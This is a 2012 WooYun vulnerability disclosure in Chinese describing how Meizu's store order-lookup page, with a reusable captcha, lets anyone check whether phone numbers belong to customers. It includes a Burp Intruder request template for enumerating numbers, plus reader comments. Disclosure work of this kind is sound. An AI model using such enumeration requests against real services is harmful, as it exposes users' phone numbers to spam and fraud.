当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016339

漏洞标题:魅族科技可能会泄露用户手机号码

相关厂商:魅族科技

漏洞作者: imlonghao

提交时间:2012-12-21 20:41

修复时间:2012-12-26 20:41

公开时间:2012-12-26 20:41

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-21: 细节已通知厂商并且等待厂商处理中
2012-12-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

虽然我没有MX,但是我是一个好的煤油!
如果你愿意,请让我成为一名正式的煤油!
-:)

详细说明:

漏洞出在手机号码查询订单的地方,提交一个手机号码时,会提示该手机是否曾经提交过订单,同时,验证码纯属摆设,没有一个失效,允许同一个验证码进行多次查询。
利用:非法分子得到魅族用户手机号码——)发送广告短信或进行其他欺骗等(指定对象)

漏洞证明:

burp suite 下的入侵者功能!

GET http://store.meizu.com/myorder/sms_chknum?phone=§§&captcha=pdhh HTTP/1.1
Host: store.meizu.com
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari/537.4
Accept: */*
Referer: http://store.meizu.com/myorder/phone_detail.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: XXXXXXXX


QQ截图20121221203747.png


跑了一下,成功了许多!
如果无法复现成功,欢迎与我联系!

修复方案:

赠送一部MX2!!!!
))验证码一次性使用,使用一次即失效!

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-12-26 20:41

厂商回复:

最新状态:

2013-01-05:我们已经知悉并尽快处理,谢谢!


漏洞评价:

评论

  1. 2012-12-21 20:42 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    。。。。。 我感觉自己犯罪了,突然间这么多关于魅族的漏洞信息。。。。

  2. 2012-12-21 20:50 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @Clar 准确来说是看到魅族有了回应..所以就发了...他连续忽略4个漏洞....

  3. 2012-12-21 21:24 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @imlonghao 呵呵 确实

  4. 2012-12-22 12:52 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    不错,支持,作为煤油希望魅族越来越安全

  5. 2012-12-27 10:41 | 笨小孩 ( 实习白帽子 | Rank:50 漏洞数:7 | 逆水行舟,不进则退。)

    支持,不但发现不但完善....

  6. 2014-08-18 17:24 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    他们肯定不给你。